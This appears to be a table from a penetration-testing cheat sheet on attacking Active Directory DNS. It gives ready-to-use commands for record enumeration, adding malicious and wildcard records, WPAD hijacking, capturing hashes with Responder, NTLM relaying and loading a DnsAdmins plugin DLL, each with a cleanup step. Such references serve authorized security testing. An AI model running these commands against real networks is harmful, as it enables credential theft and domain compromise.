| Basic DNS enumeration | Network access to DNS | dig, nslookup | dig @$DC _ldap._tcp.dc._msdcs.$DOMAIN SRV | DCs, services, hosts, zone metadata | None |
| ADIDNS dump | Domain credentials | adidnsdump | adidnsdump -u "$DOMAIN\\$USER" -p "$PASS" ldap://$DC -r | Internal DNS records over LDAP | None |
| Zone transfer | Misconfigured AXFR or local DC access | dig, dnscmd | dig @$DC $DOMAIN AXFR | Full zone contents | Disable transfer if misconfigured |
| Dynamic A record add | Dynamic update allowed | nsupdate | update add fileshare.ootw.local 60 A 10.10.10.100 | Attacker-controlled name | update delete fileshare.ootw.local A |
| Kerberos dynamic update | Valid TGT and secure update rights | kinit, nsupdate -g | nsupdate -g | Secure DNS update through GSS-TSIG | Delete exact record |
| ADIDNS record write | Domain credentials with create/write rights | dnstool.py | --action add --record fileshare --data 10.10.10.100 | Name resolves to attacker | --action remove --record fileshare |
| ADIDNS wildcard write | Domain credentials with create/write rights | dnstool.py | --action add --record '*' --data 10.10.10.100 | Unmatched names resolve to attacker | --action remove --record '*' |
| WPAD hijack | Ability to create wpad or DnsAdmins rights to unblock it | dnstool.py, PowerShell DNS cmdlets | --record wpad --data 10.10.10.100 | Browser/proxy auth to attacker | Delete wpad, restore query block list |
| Poisoning to capture | Victim resolves attacker-controlled name | Responder, Inveigh | sudo responder -I eth0 -w | NetNTLMv2 capture or relay source | Stop listener and remove DNS trigger |
| Poisoning to relay | Victim resolves attacker-controlled name and target accepts relay | ntlmrelayx.py, Responder | ntlmrelayx.py -tf targets.txt -smb2support | SMB, LDAP, ADCS, or HTTP relay | Remove record and undo relay change |
| DnsAdmins plugin DLL | DnsAdmins membership and DNS service restart | dnscmd.exe | /config /serverlevelplugindll C:\Path\payload.dll | DLL loads as DNS service context | Delete registry value and restart DNS |
| DnsAdmins WPAD | DnsAdmins rights | Set-DnsServerGlobalQueryBlockList, Add-DnsServerResourceRecordA | Add wpad after removing block | WPAD capture or relay setup | Re-enable block list and delete record |